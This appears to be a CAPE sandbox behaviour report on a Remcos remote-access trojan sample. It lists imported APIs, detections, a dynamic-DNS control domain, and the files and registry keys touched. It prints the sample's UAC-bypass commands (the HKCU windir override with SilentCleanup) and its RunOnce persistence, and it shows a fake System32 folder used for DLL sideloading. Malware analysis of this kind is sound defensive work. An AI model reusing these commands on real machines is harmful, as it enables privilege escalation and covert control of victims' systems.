DynamicLoader: MSVCP60.dll/?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ
DynamicLoader: MSVCP60.dll/??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ
DynamicLoader: MSVCP60.dll/?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ
DynamicLoader: MSVCP60.dll/??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z
DynamicLoader: MSVCP60.dll/??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z
DynamicLoader: MSVCP60.dll/??8std@@YA_NPBGABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@@Z
DynamicLoader: MSVCP60.dll/?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z
DynamicLoader: MSVCP60.dll/?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z
DynamicLoader: MSVCP60.dll/?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@@Z
DynamicLoader: MSVCP60.dll/??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z
DynamicLoader: MSVCP60.dll/?find_last_of@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z
DynamicLoader: MSVCP60.dll/?find_last_of@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z
DynamicLoader: MSVCP60.dll/??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z
DynamicLoader: MSVCP60.dll/?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ
DynamicLoader: MSVCP60.dll/??0Init@ios_base@std@@QAE@XZ
DynamicLoader: MSVCP60.dll/??1Init@ios_base@std@@QAE@XZ
DynamicLoader: MSVCP60.dll/??0_Winit@std@@QAE@XZ
DynamicLoader: MSVCP60.dll/??1_Winit@std@@QAE@XZ
DynamicLoader: MSVCP60.dll/?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z
DynamicLoader: MSVCP60.dll/?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z
DynamicLoader: MSVCP60.dll/??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z
DynamicLoader: MSVCP60.dll/?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ
DynamicLoader: MSVCP60.dll/?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ
DynamicLoader: MSVCP60.dll/??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z
DynamicLoader: MSVCP60.dll/?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ
DynamicLoader: MSVCP60.dll/?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ
DynamicLoader: MSVCP60.dll/?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ
DynamicLoader: MSVCP60.dll/?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z
DynamicLoader: MSVCP60.dll/?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXID@Z
DynamicLoader: MSVCP60.dll/?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ
DynamicLoader: MSVCP60.dll/??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGIABV?$allocator@G@1@@Z
DynamicLoader: MSVCP60.dll/??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z
DynamicLoader: MSVCP60.dll/?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ
DynamicLoader: MSVCP60.dll/?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ
DynamicLoader: MSVCP60.dll/?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ
DynamicLoader: MSVCP60.dll/?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z
DynamicLoader: MSVCP60.dll/?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ
DynamicLoader: MSVCP60.dll/?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z
DynamicLoader: MSVCP60.dll/?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z
DynamicLoader: MSVCP60.dll/??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@G@Z
DynamicLoader: MSVCP60.dll/?npos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@2IB
DynamicLoader: MSVCP60.dll/?rfind@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z
DynamicLoader: MSVCP60.dll/?resize@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEXI@Z
DynamicLoader: MSVCP60.dll/??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z
DynamicLoader: MSVCP60.dll/??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z
DynamicLoader: MSVCP60.dll/?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z
DynamicLoader: MSVCP60.dll/??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z
DynamicLoader: MSVCP60.dll/??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z
DynamicLoader: MSVCP60.dll/??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z
DynamicLoader: MSVCP60.dll/??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z
DynamicLoader: MSVCP60.dll/??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@IIABV?$allocator@D@1@@Z
DynamicLoader: MSVCP60.dll/??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z
DynamicLoader: MSVCP60.dll/??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z
DynamicLoader: MSVCP60.dll/?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ
DynamicLoader: MSVCP60.dll/??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z
DynamicLoader: MSVCP60.dll/?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ
DynamicLoader: MSVCP60.dll/??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z
DynamicLoader: MSVCP60.dll/?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ
DynamicLoader: MSVCP60.dll/?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ
DynamicLoader: MSVCP60.dll/??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z
DynamicLoader: MSVCP60.dll/??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z
DynamicLoader: MSVCP60.dll/?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB
DynamicLoader: MSVCP60.dll/??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z
DynamicLoader: MSVCP60.dll/?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z
DynamicLoader: MSVCP60.dll/??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@@Z
DynamicLoader: MSVCP60.dll/??1out_of_range@std@@UAE@XZ
DynamicLoader: MSVCP60.dll/??0out_of_range@std@@QAE@ABV01@@Z
DynamicLoader: MSVCP60.dll/??0logic_error@std@@QAE@ABV01@@Z
DynamicLoader: MSVCP60.dll/??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z
DynamicLoader: MSVCP60.dll/??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z
DynamicLoader: MSVCP60.dll/??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z
DynamicLoader: MSVCP60.dll/??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z
DynamicLoader: MSVCP60.dll/??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z
DynamicLoader: MSVCP60.dll/?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ
DynamicLoader: MSVCP60.dll/??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z
DynamicLoader: MSVCP60.dll/??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z
DynamicLoader: MSVCP60.dll/??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z
DynamicLoader: MSVCP60.dll/??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z
DynamicLoader: MSVCP60.dll/?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z
DynamicLoader: MSVCP60.dll/?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ
DynamicLoader: MSVCP60.dll/??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ
DynamicLoader: MSVCP60.dll/??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z
DynamicLoader: MSVCP60.dll/??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ
DynamicLoader: MSVCP60.dll/??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z
DynamicLoader: SHLWAPI.dll/PathFileExistsW
DynamicLoader: SHLWAPI.dll/PathFileExistsA
DynamicLoader: SHLWAPI.dll/StrToIntA
DynamicLoader: WINMM.dll/PlaySoundW
DynamicLoader: WINMM.dll/mciSendStringA
DynamicLoader: WINMM.dll/waveInStop
DynamicLoader: WINMM.dll/waveInOpen
DynamicLoader: WINMM.dll/waveInClose
DynamicLoader: WINMM.dll/waveInUnprepareHeader
DynamicLoader: WINMM.dll/waveInPrepareHeader
DynamicLoader: WINMM.dll/mciSendStringW
DynamicLoader: WINMM.dll/waveInAddBuffer
DynamicLoader: WINMM.dll/waveInStart
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: urlmon.dll/URLOpenBlockingStreamW
DynamicLoader: gdiplus.dll/GdipLoadImageFromStreamICM
DynamicLoader: gdiplus.dll/GdipLoadImageFromStream
DynamicLoader: gdiplus.dll/GdipDisposeImage
DynamicLoader: gdiplus.dll/GdipCloneImage
DynamicLoader: gdiplus.dll/GdipAlloc
DynamicLoader: gdiplus.dll/GdipSaveImageToStream
DynamicLoader: gdiplus.dll/GdipSaveImageToFile
DynamicLoader: gdiplus.dll/GdiplusStartup
DynamicLoader: gdiplus.dll/GdipGetImageEncoders
DynamicLoader: gdiplus.dll/GdipGetImageEncodersSize
DynamicLoader: gdiplus.dll/GdipFree
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: USER32.dll/GetCursorInfo
DynamicLoader: USER32.dll/GetLastInputInfo
DynamicLoader: kernel32.dll/GetConsoleWindow
DynamicLoader: PSAPI.DLL/GetModuleFileNameExA
DynamicLoader: PSAPI.DLL/GetModuleFileNameExW
DynamicLoader: kernel32.dll/GlobalMemoryStatusEx
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: kernel32.dll/GetComputerNameExW
DynamicLoader: SHELL32.dll/IsUserAnAdmin
DynamicLoader: kernel32.dll/SetProcessDEPPolicy
Reads data out of its own binary image
self_read: process: iz3Ehm6t.exe, pid: 1964, offset: 0x00000000, length: 0x00170c0c
CAPE extracted potentially suspicious content
iz3Ehm6t.exe: : 32-bit DLL
The binary contains an unknown PE section name indicative of packing
unknown section: name: CODE, entropy: 6.54, characteristics: IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ, raw_size: 0x0005f200, virtual_size: 0x0005f17c
unknown section: name: DATA, entropy: 3.88, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size: 0x00001400, virtual_size: 0x00001208
unknown section: name: BSS, entropy: 0.00, characteristics: IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size: 0x00000000, virtual_size: 0x0007ad39
Uses Windows utilities for basic functionality
command: cmd /c ""C:\Users\Public\Natso.bat" "
command: cmd /c ""C:\Users\Public\Yeso.bat" "
command: "C:\Program Files (x86)\internet explorer\ieinstal.exe"
command: C:\Program Files (x86)\internet explorer\ieinstal.exe
command: reg delete hkcu\Environment /v windir /f
command: reg delete hkcu\Environment /v windir /f
command: reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\Yako.bat reg delete hkcu\Environment /v windir /f && REM "
command: reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\Yako.bat reg delete hkcu\Environment /v windir /f && REM "
command: reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\Yako.bat reg delete hkcu\Environment /v windir /f && REM "
Uses Windows utilities for basic functionality
command: reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\Yako.bat reg delete hkcu\Environment /v windir /f && REM "
command: schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Behavioural detection: Injection (inter-process)
Behavioural detection: Injection with CreateRemoteThread in a remote process
Installs itself for autorun at Windows startup
key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\iz3Eh
data: C:\Users\Public\iz3Eh.hta
Creates a copy of itself
copy: C:\Users\Public\iz3Eh\iz3Ehyen.exe
Creates known Remcos mutexes
Creates known Remcos registry keys
Key: HKEY_CURRENT_USER\Software\Remcos-GMZ5DV\
Anomalous binary characteristics
anomaly: Timestamp on binary predates the release date of the OS version it requires by at least a year

Screenshots


Hosts

Direct IP Country Name
Y 8.8.8.8 [VT] United States

DNS

Name Response Post-Analysis Lookup
junior3431.ddns.net [VT] NXDOMAIN [VT]

Summary

C:\Users\user\AppData\Local\Temp\iz3Ehm6t.ENG
C:\Users\user\AppData\Local\Temp\iz3Ehm6t.ENG.DLL
C:\Users\user\AppData\Local\Temp\iz3Ehm6t.EN
C:\Users\user\AppData\Local\Temp\iz3Ehm6t.EN.DLL
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Users\user\AppData\Local\Temp\OCTAPION.TXT
C:\Users\user\AppData\Local\Temp\iz3Eh
C:\Users\user\AppData\Local\Temp\iz3Ehm6t.exe
C:\Users\Public\iz3Eh\iz3Ehyen.exe
C:\Windows\Finex
C:\Users\Public\Yako.bat
C:\Users\Public\Natso.bat
C:\Windows\SysWOW64
C:\Users\Public\SSPICLI.dll
C:\Users\Public\perfmon.exe
C:\Users\Public\Yeso.bat
C:\Users\Public\iz3Eh
C:\Users\Public\iz3Eh\iz3Eh
C:\Users\Public\iz3Eh.hta
C:\Program Files (x86)\internet explorer\ieinstal.exe
C:\Users\Public
C:\Users
C:\Users\Public\"C:\Users\Public\Natso.bat"
C:\Users\Public\reg.*
C:\Users\Public\reg
C:\Windows\System32\reg.*
C:\Windows\System32\reg.COM
C:\Windows\System32\reg.exe
C:\Users\Public\schtasks.*
C:\Users\Public\schtasks
C:\Windows\System32\schtasks.*
C:\Windows\System32\schtasks.COM
C:\Windows\System32\schtasks.exe
C:\Windows\SysWOW64\en-US\reg.exe.mui
C:\Windows\SysWOW64\en-US\KERNELBASE.dll.mui
\Device\KsecDD
\??\MountPointManager
C:\Windows\sysnative\WerFault.exe
C:\Windows
C:\Windows\sysnative
C:\Users\Public\"C:\Users\Public\Yeso.bat"
C:\Windows \System32
C:\Windows \System32\*
C:\Windows \System32\perfmon.exe
C:\Windows \System32\SSPICLI.dll
C:\Users\Public\"C:\Windows \System32\perfmon.exe"
C:\Program Files (x86)\internet explorer\ieinstal.exe.Local\
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
C:\Users\user\AppData\Roaming
C:\Users\user
C:\Users\user\AppData
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Users\user\AppData\Local\Temp\iz3Ehm6t.exe
C:\Users\user\AppData\Local\Temp\iz3Eh
C:\Users\Public\Yako.bat
C:\Users\Public\Natso.bat
C:\Users\Public\SSPICLI.dll
C:\Users\Public\perfmon.exe
C:\Users\Public\Yeso.bat
C:\Users\Public\iz3Eh.hta
C:\Windows\SysWOW64\en-US\reg.exe.mui
C:\Windows\SysWOW64\en-US\KERNELBASE.dll.mui
\Device\KsecDD
C:\Windows\sysnative\WerFault.exe
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
C:\Users\user\AppData\Local\Temp\iz3Eh
C:\Users\Public\Yako.bat
C:\Users\Public\Natso.bat
C:\Users\Public\SSPICLI.dll
C:\Users\Public\perfmon.exe
C:\Users\Public\Yeso.bat
C:\Users\Public\iz3Eh\iz3Ehyen.exe
C:\Users\Public\iz3Eh\iz3Eh
C:\Users\Public\iz3Eh.hta
C:\Windows \System32\perfmon.exe
C:\Windows \System32\SSPICLI.dll
C:\Users\Public\Natso.bat
C:\Users\Public\Yako.bat
C:\Users\Public\SSPICLI.dll
C:\Users\Public\Yeso.bat
C:\Users\Public\perfmon.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT
HKEY_CURRENT_USER
DisableUserModeCallbackFilter
HKEY_CURRENT_USER\Software\Borland\Locales
HKEY_LOCAL_MACHINE\Software\Borland\Locales
HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000809
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Runonce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\iz3Eh
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Option
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
HKEY_CURRENT_USER\Environment
HKEY_CURRENT_USER\Environment\windir
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SQMClient\Windows
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Classes\AppID\schtasks.exe
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Hostname
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\System\DNSclient
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Domain
HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\SecurityService
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService\9
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LsaExtensionConfig\SspiCli
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\LsaExtensionConfig\SspiCli\CheckSignatureDll
\xe3\xa9\xa0\xc3\x8cEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\LsaExtensionConfig\SspiCli\CheckSignatureDll
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\LsaExtensionConfig\SspiCli\CheckSignatureRoutine
\xe3\xa9\xa0\xc3\x8cEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\LsaExtensionConfig\SspiCli\CheckSignatureRoutine
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SecurityProviders
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\SspiCache
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Name
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Comment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Capabilities
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\RpcId
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Version
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\TokenSize
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\SaslProfiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\crypt32
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DebugHeapFlags
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DisableImprovedZoneCheck
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\msasn1
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\SourcePath
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\DevicePath
HKEY_LOCAL_MACHINE\system\CurrentControlSet\control\NetworkProvider\HwOrder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IEInstal.exe\DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_CURRENT_USER\Software\Remcos-GMZ5DV\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
\xef\xb0\xa8\xc9\x96EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\ProductName
HKEY_CURRENT_USER\Software\Remcos-GMZ5DV\exepath
HKEY_CURRENT_USER\Software\Remcos-GMZ5DV\licence
HKEY_CURRENT_USER\Software\Remcos-GMZ5DV\override
DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
